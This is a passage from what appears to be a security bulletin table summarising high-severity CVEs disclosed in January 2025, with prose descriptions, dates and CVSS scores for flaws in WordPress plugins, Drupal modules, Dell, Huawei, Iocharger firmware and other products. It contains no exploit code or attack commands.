Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Classic Addons Classic Addons - WPBakery Page Builder allows PHP Local File Inclusion.This issue affects Classic Addons - WPBakery Page Builder: from n/a through 3.0. | 2025-01-07 | 7.5 | CVE-2024-56286 |
| ClickWhale--ClickWhale Link Manager, Link Shortener and Click Tracker for Affiliate Links & Link Pages |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ClickWhale ClickWhale - Link Manager, Link Shortener and Click Tracker for Affiliate Links & Link Pages allows Blind SQL Injection.This issue affects ClickWhale - Link Manager, Link Shortener and Click Tracker for Affiliate Links & Link Pages: from n/a through 2.4.1. | 2025-01-07 | 8.5 | CVE-2024-51715 |
| code-projects--Admission Management System |
A vulnerability was found in code-projects Admission Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file index.php of the component Login. The manipulation of the argument u_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-09 | 7.3 | CVE-2025-0347 |
| code-projects--Cinema Seat Reservation System |
A vulnerability classified as critical was found in code-projects Cinema Seat Reservation System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/deleteBooking.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-09 | 7.3 | CVE-2025-0340 |
| CodeAstrology Team--Product Table for WooCommerce |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodeAstrology Team Product Table for WooCommerce allows Reflected XSS.This issue affects Product Table for WooCommerce: from n/a through 3.5.6. | 2025-01-09 | 7.1 | CVE-2025-22307 |
| CodeMShop-- |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in CodeMShop ì›Œë“œí”„ë ˆìŠ¤ ê²°ì œ ì‹¬í”ŒíŽ˜ì´ allows PHP Local File Inclusion.This issue affects ì›Œë“œí”„ë ˆìŠ¤ ê²°ì œ 심플페ì´: from n/a through 5.2.0. | 2025-01-07 | 7.5 | CVE-2024-56281 |
| cozyvision1--SMS Alert Order Notifications WooCommerce |
The SMS Alert Order Notifications - WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the updateWcWarrantySettings() function in all versions up to, and including, 3.7.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site. Please note this requires the woocommerce-warranty plugin to be installed in order to be exploited. | 2025-01-07 | 8.8 | CVE-2024-11725 |
| crowdfavorite--CF Internal Link Shortcode |
The CF Internal Link Shortcode plugin for WordPress is vulnerable to SQL Injection via the 'post_title' parameter in all versions up to, and including, 1.1.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-01-11 | 7.5 | CVE-2024-12404 |
| databasebackup--WP Database Backup Unlimited Database & Files Backup by Backup for WP |
The WP Database Backup - Unlimited Database & Files Backup by Backup for WP plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.3 via publicly accessible back-up files. This makes it possible for unauthenticated attackers to extract sensitive data including all information stored in the database. | 2025-01-09 | 7.5 | CVE-2024-12330 |
| delabon--Live Sales Notification for Woocommerce Woomotiv |
The Live Sales Notification for Woocommerce - Woomotiv plugin for WordPress is vulnerable to SQL Injection via the 'woomotiv_seen_products_.*' cookie in all versions up to, and including, 3.6.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-01-07 | 7.5 | CVE-2024-12416 |
| Dell--Dell Update Package (DUP) Framework |
Dell Update Package Framework, versions prior to 22.01.02, contain(s) a Local Privilege Escalation Vulnerability. A local low privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary remote scripts on the server. Exploitation may lead to a denial of service by an attacker. | 2025-01-07 | 8.2 | CVE-2025-22395 |
| Dell--Dell VxRail HCI |
Dell VxRail, versions 7.0.000 through 7.0.532, contain(s) a Plaintext Storage of a Password vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Information exposure. | 2025-01-08 | 7.5 | CVE-2025-21102 |
| Dell--Dell VxRail HCI |
Dell VxRail, versions 8.0.000 through 8.0.311, contain(s) a Plaintext Storage of a Password vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Information exposure. | 2025-01-08 | 7.5 | CVE-2025-21111 |
| Dennis Koot--wpSOL |
Cross-Site Request Forgery (CSRF) vulnerability in Dennis Koot wpSOL allows Stored XSS.This issue affects wpSOL: from n/a through 1.2.0. | 2025-01-07 | 7.1 | CVE-2025-22343 |
| denoland--deno |
Deno is a JavaScript, TypeScript, and WebAssembly runtime with secure defaults. When you send a request with the Authorization header to one domain, and the response asks to redirect to a different domain, Deno'sfetch() redirect handling creates a follow-up redirect request that keeps the original Authorization header, leaking its content to that second domain. This vulnerability is fixed in 2.1.2. | 2025-01-06 | 7.5 | CVE-2025-21620 |
| Designinvento--DirectoryPress |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Designinvento DirectoryPress allows Reflected XSS.This issue affects DirectoryPress: from n/a through 3.6.19. | 2025-01-07 | 7.1 | CVE-2024-49633 |
| Drupal--Advanced PWA inc Push Notifications |
Incorrect Authorization vulnerability in Drupal Advanced PWA inc Push Notifications allows Forceful Browsing.This issue affects Advanced PWA inc Push Notifications: from 0.0.0 before 1.5.0. | 2025-01-09 | 9.1 | CVE-2024-13253 |
| Drupal--Basic HTTP Authentication |
Incorrect Authorization vulnerability in Drupal Basic HTTP Authentication allows Forceful Browsing.This issue affects Basic HTTP Authentication: from 7.X-1.0 before 7.X-1.4. | 2025-01-09 | 7.3 | CVE-2024-13291 |
| Drupal--Block permissions |
Incorrect Authorization vulnerability in Drupal Block permissions allows Forceful Browsing.This issue affects Block permissions: from 1.0.0 before 1.2.0. | 2025-01-09 | 8.8 | CVE-2024-13282 |
| Drupal--Diff |
Incorrect Authorization vulnerability in Drupal Diff allows Functionality Misuse.This issue affects Diff: from 0.0.0 before 1.8.0. | 2025-01-09 | 9.1 | CVE-2024-13278 |
| Drupal--Drupal REST & JSON API Authentication |
Incorrect Authorization vulnerability in Drupal Drupal REST & JSON API Authentication allows Forceful Browsing.This issue affects Drupal REST & JSON API Authentication: from 0.0.0 before 2.0.13. | 2025-01-09 | 9.8 | CVE-2024-13258 |
| Drupal--Drupal Symfony Mailer Lite |
Cross-Site Request Forgery (CSRF) vulnerability in Drupal Drupal Symfony Mailer Lite allows Cross Site Request Forgery.This issue affects Drupal Symfony Mailer Lite: from 0.0.0 before 1.0.6. | 2025-01-09 | 8.8 | CVE-2024-13250 |
| Drupal--Email Contact |
Insufficient Granularity of Access Control vulnerability in Drupal Email Contact allows Forceful Browsing.This issue affects Email Contact: from 0.0.0 before 2.0.4. | 2025-01-09 | 7.5 | CVE-2024-13256 |
| Drupal--File Entity (fieldable files) |
Insertion of Sensitive Information Into Sent Data vulnerability in Drupal File Entity (fieldable files) allows Forceful Browsing.This issue affects File Entity (fieldable files): from 7.X-* before 7.X-2.39. | 2025-01-09 | 7.5 | CVE-2024-13276 |
| Drupal--Gutenberg |
Cross-Site Request Forgery (CSRF) vulnerability in Drupal Gutenberg allows Cross Site Request Forgery.This issue affects Gutenberg: from 0.0.0 before 2.13.0, from 3.0.0 before 3.0.5. | 2025-01-09 | 8.8 | CVE-2024-13284 |
| Drupal--Image Sizes |
Insertion of Sensitive Information Into Sent Data vulnerability in Drupal Image Sizes allows Forceful Browsing.This issue affects Image Sizes: from 0.0.0 before 3.0.2. | 2025-01-09 | 7.5 | CVE-2024-13259 |
| Drupal--Migrate queue importer |
Cross-Site Request Forgery (CSRF) vulnerability in Drupal Migrate queue importer allows Cross Site Request Forgery.This issue affects Migrate queue importer: from 0.0.0 before 2.1.1. | 2025-01-09 | 8.8 | CVE-2024-13260 |
| Drupal--Migrate Tools |
Cross-Site Request Forgery (CSRF) vulnerability in Drupal Migrate Tools allows Cross Site Request Forgery.This issue affects Migrate Tools: from 0.0.0 before 6.0.3. | 2025-01-09 | 8.8 | CVE-2024-13244 |
| Drupal--Monster Menus |
Incorrect Authorization vulnerability in Drupal Monster Menus allows Forceful Browsing.This issue affects Monster Menus: from 0.0.0 before 9.3.2. | 2025-01-09 | 9.1 | CVE-2024-13281 |
| Drupal--Open Social |
Improper Authorization vulnerability in Drupal Open Social allows Collect Data from Common Resource Locations.This issue affects Open Social: from 0.0.0 before 12.0.5. | 2025-01-09 | 9.1 | CVE-2024-13241 |
| Drupal--Open Social |
Improper Access Control vulnerability in Drupal Open Social allows Collect Data from Common Resource Locations.This issue affects Open Social: from 0.0.0 before 12.05. | 2025-01-09 | 7.5 | CVE-2024-13240 |
| Drupal--Opigno module |
Improper Neutralization of Directives in Statically Saved Code ('Static Code Injection') vulnerability in Drupal Opigno module allows PHP Local File Inclusion.This issue affects Opigno module: from 0.0.0 before 3.1.2. | 2025-01-09 | 9.8 | CVE-2024-13264 |
| Drupal--Persistent Login |
Insufficient Session Expiration vulnerability in Drupal Persistent Login allows Forceful Browsing.This issue affects Persistent Login: from 0.0.0 before 1.8.0, from 2.0.* before 2.2.2. | 2025-01-09 | 9.8 | CVE-2024-13280 |
| Drupal--Registration role |
Incorrect Privilege Assignment vulnerability in Drupal Registration role allows Privilege Escalation.This issue affects Registration role: from 0.0.0 before 2.0.1. | 2025-01-09 | 8.8 | CVE-2024-13251 |
| Drupal--REST Views |
Insertion of Sensitive Information Into Sent Data vulnerability in Drupal REST Views allows Forceful Browsing.This issue affects REST Views: from 0.0.0 before 3.0.1. | 2025-01-09 | 7.5 | CVE-2024-13254 |
| Drupal--RESTful Web Services |
Exposure of Sensitive Information Through Data Queries vulnerability in Drupal RESTful Web Services allows Forceful Browsing.This issue affects RESTful Web Services: from 7.X-2.0 before 7.X-2.10. | 2025-01-09 | 7.5 | CVE-2024-13255 |
| Drupal--Smart IP Ban |
Incorrect Authorization vulnerability in Drupal Smart IP Ban allows Forceful Browsing.This issue affects Smart IP Ban: from 7.X-1.0 before 7.X-1.1. | 2025-01-09 | 9.1 | CVE-2024-13277 |
| Drupal--Swift Mailer (abandoned) |
Exposed Dangerous Method or Function vulnerability in Drupal Swift Mailer allows Resource Location Spoofing.This issue affects Swift Mailer: *.*. | 2025-01-09 | 9.1 | CVE-2024-13242 |
| Drupal--Two-factor Authentication (TFA) |
Weak Authentication vulnerability in Drupal Two-factor Authentication (TFA) allows Authentication Abuse.This issue affects Two-factor Authentication (TFA): from 0.0.0 before 1.5.0. | 2025-01-09 | 9.8 | CVE-2024-13239 |
| Drupal--Two-factor Authentication (TFA) |
Session Fixation vulnerability in Drupal Two-factor Authentication (TFA) allows Session Fixation.This issue affects Two-factor Authentication (TFA): from 0.0.0 before 1.8.0. | 2025-01-09 | 9.8 | CVE-2024-13279 |
| Drupal--wkhtmltopdf |
Vulnerability in Drupal wkhtmltopdf.This issue affects wkhtmltopdf: *.*. | 2025-01-09 | 9.8 | CVE-2024-13285 |
| Dylan James--Zephyr Admin Theme |
Cross-Site Request Forgery (CSRF) vulnerability in Dylan James Zephyr Admin Theme allows Cross Site Request Forgery.This issue affects Zephyr Admin Theme: from n/a through 1.4.1. | 2025-01-09 | 7.1 | CVE-2025-22814 |
| eDoc Intelligence LLC--eDoc Easy Tables |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in eDoc Intelligence LLC eDoc Easy Tables allows SQL Injection.This issue affects eDoc Easy Tables: from n/a through 1.29. | 2025-01-07 | 8.5 | CVE-2025-22519 |
| eflyjason--Host PHP Info |
The Host PHP Info plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check when including the 'phpinfo' function in all versions up to, and including, 1.0.4. This makes it possible for unauthenticated attackers to read configuration settings and predefined variables on the site's server. The plugin does not need to be activated for the vulnerability to be exploited. | 2025-01-07 | 8.6 | CVE-2024-12535 |
| eherman24--Custom Product Tabs for WooCommerce |
The Custom Product Tabs for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.8.5 via deserialization of untrusted input in the 'yikes_woo_products_tabs' post meta parameter. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. | 2025-01-07 | 7.2 | CVE-2024-11465 |
| Elevio--Elevio |
Cross-Site Request Forgery (CSRF) vulnerability in Elevio Elevio allows Stored XSS.This issue affects Elevio: from n/a through 4.4.1. | 2025-01-07 | 7.1 | CVE-2025-22328 |
| ELEXtensions--ELEX WooCommerce Advanced Bulk Edit Products, Prices & Attributes |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ELEXtensions ELEX WooCommerce Advanced Bulk Edit Products, Prices & Attributes allows Blind SQL Injection.This issue affects ELEX WooCommerce Advanced Bulk Edit Products, Prices & Attributes: from n/a through 1.4.8. | 2025-01-07 | 7.6 | CVE-2025-22352 |
| Elicus--WPMozo Addons Lite for Elementor |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elicus WPMozo Addons Lite for Elementor allows PHP Local File Inclusion.This issue affects WPMozo Addons Lite for Elementor: from n/a through 1.1.0. | 2025-01-07 | 7.5 | CVE-2024-56282 |
| eProsima--DDS |
An attacker can arbitrarily craft malicious DDS Participants (or ROS 2 Nodes) with valid certificates to compromise and get full control of the attacked secure DDS databus system by exploiting vulnerable attributes in the configuration of PKCS#7 certificate's validation. This is caused by a non-compliant implementation of permission document verification used by some DDS vendors. Specifically, an improper use of the OpenSSL PKCS7_verify function used to validate S/MIME signatures. | 2025-01-09 | 8.2 | CVE-2023-24010 |
| exelban--stats |
A vulnerability, which was classified as critical, has been found in exelban stats up to 2.11.21. This issue affects the function shouldAcceptNewConnection of the component XPC Service. The manipulation leads to command injection. It is possible to launch the attack on the local host. Upgrading to version 2.11.22 is able to address this issue. It is recommended to upgrade the affected component. | 2025-01-12 | 7.8 | CVE-2025-0396 |
| FastCGI--fcgi |
FastCGI fcgi2 (aka fcgi) 2.x through 2.4.4 has an integer overflow (and resultant heap-based buffer overflow) via crafted nameLen or valueLen values in data to the IPC socket. This occurs in ReadParams in fcgiapp.c. | 2025-01-10 | 9.3 | CVE-2025-23016 |
| Frank Koenen--ldap_login_password_and_role_manager |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Frank Koenen ldap_login_password_and_role_manager allows Stored XSS.This issue affects ldap_login_password_and_role_manager: from n/a through 1.0.12. | 2025-01-07 | 7.1 | CVE-2025-22548 |
| galdub--Coupon X: Discount Pop Up, Promo Code Pop Ups, Announcement Pop Up, WooCommerce Popups |
The Coupon X: Discount Pop Up, Promo Code Pop Ups, Announcement Pop Up, WooCommerce Popups plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.5 via deserialization of untrusted input from post content passed to the capture_email AJAX action. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. | 2025-01-11 | 7.5 | CVE-2024-12627 |
| ggnomes--Garden Gnome Package |
The Garden Gnome Package plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the functionality that automatically extracts 'ggpkg' files that have been uploaded in all versions up to, and including, 2.3.0. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-01-08 | 8.8 | CVE-2024-12854 |
| go-git--go-git |
go-git is a highly extensible git implementation library written in pure Go. An argument injection vulnerability was discovered in go-git versions prior to v5.13. Successful exploitation of this vulnerability could allow an attacker to set arbitrary values to git-upload-pack flags. This only happens when the file transport protocol is being used, as that is the only protocol that shells out to git binaries. This vulnerability is fixed in 5.13.0. | 2025-01-06 | 9.8 | CVE-2025-21613 |
| go-git--go-git |
go-git is a highly extensible git implementation library written in pure Go. A denial of service (DoS) vulnerability was discovered in go-git versions prior to v5.13. This vulnerability allows an attacker to perform denial of service attacks by providing specially crafted responses from a Git server which triggers resource exhaustion in go-git clients. Users running versions of go-git from v4 and above are recommended to upgrade to v5.13 in order to mitigate this vulnerability. | 2025-01-06 | 7.5 | CVE-2025-21614 |
| google -- android |
In DevmemIntMapPages of devicemem_server.c, there is a possible physical page uaf due to a logic error in the code. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-01-08 | 7.8 | CVE-2023-35685 |
| Google--Chrome |
Type Confusion in V8 in Google Chrome prior to 131.0.6778.264 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2025-01-08 | 8.3 | CVE-2025-0291 |
| Gravity Master--Custom Field For WP Job Manager |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gravity Master Custom Field For WP Job Manager allows Reflected XSS.This issue affects Custom Field For WP Job Manager: from n/a through 1.3. | 2025-01-07 | 7.1 | CVE-2025-22294 |
| Greg Whitehead--Norse Rune Oracle Plugin |
Cross-Site Request Forgery (CSRF) vulnerability in Greg Whitehead Norse Rune Oracle Plugin allows Cross Site Request Forgery.This issue affects Norse Rune Oracle Plugin: from n/a through 1.4.1. | 2025-01-07 | 7.1 | CVE-2025-22556 |
| Grocy project--Grocy |
The edit profile function of Grocy through 4.3.0 allows stored XSS and resultant privilege escalation by uploading a crafted HTML or SVG file, a different issue than CVE-2024-8370. | 2025-01-06 | 8.8 | CVE-2024-55074 |
| Grocy project--Grocy |
Grocy through 4.3.0 has no CSRF protection, as demonstrated by changing the Administrator's password. | 2025-01-06 | 8.1 | CVE-2024-55076 |
| Groundhogg Inc.--Groundhogg |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Groundhogg Inc. Groundhogg allows Reflected XSS.This issue affects Groundhogg: from n/a through 3.7.3.3. | 2025-01-07 | 7.1 | CVE-2024-56289 |
| hccoder Sndor Fodor--Better User Shortcodes |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in hccoder - Sándor Fodor Better User Shortcodes allows Reflected XSS.This issue affects Better User Shortcodes: from n/a through 1.0. | 2025-01-09 | 7.1 | CVE-2025-22594 |
| HCL Software--DRYiCE MyXalytics |
HCL MyXalytics is affected by out-of-band resource load (HTTP) vulnerability. An attacker can deploy a web server that returns malicious content, and then induce the application to retrieve and process that content. | 2025-01-11 | 8.9 | CVE-2024-42168 |
| HCL Software--DRYiCE MyXalytics |
HCL MyXalytics is affected by insecure direct object references. It occurs due to missing access control checks, which fail to verify whether a user should be allowed to access specific data. | 2025-01-11 | 7.1 | CVE-2024-42169 |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking 501 Wireless Client Bridge |
Multiple command injection vulnerabilities exist in the web interface of the 501 Wireless Client Bridge which could lead to authenticated remote command execution. Successful exploitation of these vulnerabilities result in the ability of an attacker to execute arbitrary commands as a privileged user on the underlying operating system. Exploitation requires administrative authentication credentials on the host system. | 2025-01-07 | 7.2 | CVE-2024-54006 |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking 501 Wireless Client Bridge |
Multiple command injection vulnerabilities exist in the web interface of the 501 Wireless Client Bridge which could lead to authenticated remote command execution. Successful exploitation of these vulnerabilities result in the ability of an attacker to execute arbitrary commands as a privileged user on the underlying operating system. Exploitation requires administrative authentication credentials on the host system. | 2025-01-07 | 7.2 | CVE-2024-54007 |
| Hiren Patel--WP Music Player |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Hiren Patel WP Music Player allows SQL Injection.This issue affects WP Music Player: from n/a through 1.3. | 2025-01-07 | 7.6 | CVE-2025-22536 |
| Hometory--Mang Board WP |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hometory Mang Board WP allows Reflected XSS.This issue affects Mang Board WP: from n/a through 1.8.4. | 2025-01-07 | 7.1 | CVE-2024-56296 |
| Huawei--HarmonyOS |
Access control vulnerability in the identity authentication module Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-01-08 | 7.5 | CVE-2024-56439 |
| Huawei--HarmonyOS |
Cross-process screen stack vulnerability in the UIExtension module Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-01-08 | 7.5 | CVE-2024-56444 |
| Huawei--HarmonyOS |
Vulnerability of improper permission control in the window management module Impact: Successful exploitation of this vulnerability may affect service confidentiality. | 2025-01-08 | 7.8 | CVE-2024-56447 |
| Huawei--HarmonyOS |
Integer overflow vulnerability during glTF model loading in the 3D engine module Impact: Successful exploitation of this vulnerability may affect availability. | 2025-01-08 | 7.3 | CVE-2024-56451 |
| IBM--Controller |
IBM Cognos Controller 11.0.0 through 11.0.1 and IBM Controller 11.1.0 could allow an unauthorized user to obtain valid tokens to gain access to protected resources due to improper certificate validation. | 2025-01-07 | 8.2 | CVE-2024-40702 |
| IBM--Engineering Requirements Management DOORS Next |
IBM Engineering Requirements Management DOORS Next 7.0.2 and 7.0.3 could allow a remote attacker to bypass security restrictions, caused by a race condition. By sending a specially crafted request, an attacker could exploit this vulnerability to remotely execute code. | 2025-01-10 | 9.8 | CVE-2024-41787 |
| Instabot--Instabot |
Cross-Site Request Forgery (CSRF) vulnerability in Instabot Instabot allows Cross Site Request Forgery.This issue affects Instabot: from n/a through 1.10. | 2025-01-07 | 7.1 | CVE-2025-22571 |
| Iocharger--Iocharger firmware for AC chargers |
Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability allows OS Command Injection as root This issue affects Iocharger firmware for AC model chargers before version 24120701 Likelihood: Moderate - The <redacted> binary does not seem to be used by the web interface, so it might be more difficult to find. It seems to be largely the same binary as used by the Iocharger Pedestal charging station, however. The attacker will also need a (low privilege) account to gain access to the <redacted> binary, or convince a user with such access to execute a crafted HTTP request. Impact: Critical - The attacker has full control over the charging station as the root user, and can arbitrarily add, modify and delete files and services. | 2025-01-09 | 8.8 | CVE-2024-43652 |
| Iocharger--Iocharger firmware for AC models |
The <redacted>.so library, which is used by <redacted>, is vulnerable to a buffer overflow in the code that handles the deletion of certificates. This buffer overflow can be triggered by providing a long file path to the <redacted> action of the <redacted>.exe CGI binary or to the <redacted>.sh CGI script. This binary or script will write this file path to <redacted>, which is then read by <redacted>.so This issue affects Iocharger firmware for AC models before version 24120701. Likelihood: Moderate - An attacker will have to find this exploit by either obtaining the binaries involved in this vulnerability, or by trial and error. Furthermore, the attacker will need a (low privilege) account to gain access to the <redacted>.exe CGI binary or <redacted>.sh script to trigger the vulnerability, or convince a user with such access send an HTTP request that triggers it. Impact: High - The <redacted> process, which we assume is responsible for OCPP communication, will keep crashing after performing the exploit. This happens because the buffer overflow causes the process to segfault before <redacted> is removed. This means that, even though <redacted> is automatically restarted, it will crash again as soon as it tries to parse the text file. CVSS clarification. The attack can be executed over any network connection the station is listening to and serves the web interface (AV:N), and there are no additional security measure sin place that need to be circumvented (AC:L), the attack does not rely on preconditions (AT:N). The attack does require authentication, but the level of authentication is irrelevant (PR:L), it does not require user interaction (UI:N). The attack leads to reducred availability of the device (VC:N/VI:N/VA:H). THere is not impact on subsequent systems. (SC:N/SI:N/SA:N). Alltough this device is an EV charger handing significant amounts of power, we do not forsee a safety impact. The attack can be automated (AU:Y). Because the DoS condition is written to disk persistantly, it cannot be recovered by the user (R:I). | 2025-01-09 | 9.8 | CVE-2024-43661 |
| Iocharger--Iocharger firmware for AC models |
There are many buffer overflow vulnerabilities present in several CGI binaries of the charging station.This issue affects Iocharger firmware for AC model chargers beforeversion 24120701. Likelihood: High - Given the prevalence of these buffer overflows, and the clear error message of the web server, an attacker is very likely to be able to find these vulnerabilities. Impact: Low - Usually, overflowing one of these buffers just causes a segmentation fault of the CGI binary, which causes the web server to return a 502 Bad Gateway error. However the webserver itself is not affected, and no DoS can be achieved. Abusing these buffer overflows in a meaningful way requires highly technical knowledge, especially since ASLR also seems to be enabled on the charging station. However, a skilled attacker might be able to use one of these buffer overflows to obtain remote code execution. CVSS clarification. The attack can be executed over any network connection the station is listening to and serves the web interface (AV:N), and there are no additional security measure sin place that need to be circumvented (AC:L), the attack does not rely on preconditions (AT:N). The attack does require authentication, but the level of authentication is irrelevant (PR:L), it does not require user interaction (UI:N). The attack has a small impact on the availability of the device (VC:N/VI:N/VA:L). There is no impact on subsequent systems. (SC:N/SI:N/SA:N). While this device is an EV charger handing significant amounts of power, we do not expect this vulnerability to have a safety impact. The attack can be automated (AU:Y). | 2025-01-09 | 9.8 | CVE-2024-43663 |
| Iocharger--Iocharger firmware for AC models |
Command injection in the <redacted> parameter of a <redacted>.exe request leads to remote code execution as the root user. This issue affects Iocharger firmware for AC models before version 24120701. Likelihood: Moderate - This action is not a common place for command injection vulnerabilities to occur. Thus, an attacker will likely only be able to find this vulnerability by reverse-engineering the firmware or trying it on all <redacted> fields. The attacker will also need a (low privilege) account to gain access to the <redacted> binary, or convince a user with such access to execute a payload. Impact: Critical - The attacker has full control over the charging station as the root user, and can arbitrarily add, modify and delete files and services. CVSS clarification. The attack can be executed over any network connection the station is listening to and serves the web interface (AV:N), and there are no additional security measure sin place that need to be circumvented (AC:L), the attack does not rely on preconditions (AT:N). The attack does require authentication, but the level of authentication is irrelevant (PR:L), it does not require user interaction (UI:N). If is a full system compromise, potentially fully compromising confidentiality, integrity and availability of the devicer (VC:H/VI:H/VA:H). A compromised charger can be used to "pivot" onto networks that should otherwise be closed, cause a low confidentiality and interity impact on subsequent systems. (SC:L/SI:L/SA:H). Because this device is an EV charger handing significant amounts of power, we suspect this vulnerability can have a safety impact (S:P). The attack can be automated (AU:Y). | 2025-01-09 | 8.8 | CVE-2024-43648 |
| Iocharger--Iocharger firmware for AC models |
Authenticated command injection in the filename of a <redacted>.exe request leads to remote code execution as the root user. This issue affects Iocharger firmware for AC models before version 24120701. Likelihood: Moderate - This action is not a common place for command injection vulnerabilities to occur. Thus, an attacker will likely only be able to find this vulnerability by reverse-engineering the firmware or trying it on all <redacted> fields. The attacker will also need a (low privilege) account to gain access to the <redacted> binary, or convince a user with such access to execute a payload. Impact: Critical - The attacker has full control over the charging station as the root user, and can arbitrarily add, modify and delete files and services. CVSS clarification:Â This attack can be performed over any network conenction serving the web interfacr (AV:N), and there are not additional mitigating measures that need to be circumvented (AC:L) or other prerequisites (AT:N). The attack does require privileges, but the level does not matter (PR:L), there is no user interaction required (UI:N). The attack leeds to a full compromised of the charger (VC:H/VI:H/VA:H) and a compromised charger can be used to "pivot" to networks that should normally not be reachable (SC:L/SI:L/SA:H). Because this is an EV chargers with significant pwoer, there is a potential safety imp0act (S:P). THis attack can be automated (AU:Y). | 2025-01-09 | 8.8 | CVE-2024-43649 |
| Iocharger--Iocharger firmware for AC models |
Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability allows OS Command Injection as root This issue affects Iocharger firmware for AC model chargers before version 24120701. Likelihood: Moderate - The <redacted> binary does not seem to be used by the web interface, so it might be more difficult to find. It seems to be largely the same binary as used by the Iocharger Pedestal charging station, however. The attacker will also need a (low privilege) account to gain access to the <redacted> binary, or convince a user with such access to execute a crafted HTTP request. Impact: Critical - The attacker has full control over the charging station as the root user, and can arbitrarily add, modify and delete files and services. CVSS clarification: Any network interface serving the web ui is vulnerable (AV:N) and there are not additional security measures to circumvent (AC:L), nor does the attack require and existing preconditions (AT:N). The attack is authenticated, but the level of authentication does not matter (PR:L), nor is any user interaction required (UI:N). The attack leads to a full compromised (VC:H/VI:H/VA:H), and compromised devices can be used to pivot into networks that should potentially not be accessible (SC:L/SI:L/SA:H). Becuase this is an EV charger handing significant power, there is a potential safety impact (S:P). This attack can be automated (AU:Y). | 2025-01-09 | 8.8 | CVE-2024-43653 |
| Iocharger--Iocharger firmware for AC models |
Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Iocharger firmware for AC models allows OS Command Injection as root This issue affects all Iocharger AC EV charger models on a firmware version before 25010801. Likelihood: Moderate - The <redacted> binary does not seem to be used by the web interface, so it might be more difficult to find. It seems to be largely the same binary as used by the Iocharger Pedestal charging station, however. The attacker will also need a (low privilege) account to gain access to the <redacted> binary, or convince a user with such access to execute a crafted HTTP request. Impact: Critical - The attacker has full control over the charging station as the root user, and can arbitrarily add, modify and delete files and services. CVSS clarification: Any network interface serving the web ui is vulnerable (AV:N) and there are not additional security measures to circumvent (AC:L), nor does the attack require and existing preconditions (AT:N). The attack is authenticated, but the level of authentication does not matter (PR:L), nor is any user interaction required (UI:N). The attack leads to a full compromised (VC:H/VI:H/VA:H), and compromised devices can be used to pivot into networks that should potentially not be accessible (SC:L/SI:L/SA:H). Becuase this is an EV charger handing significant power, there is a potential safety impact (S:P). This attack can be automated (AU:Y). | 2025-01-09 | 8.8 | CVE-2024-43654 |
| Iocharger--Iocharger firmware for AC models |
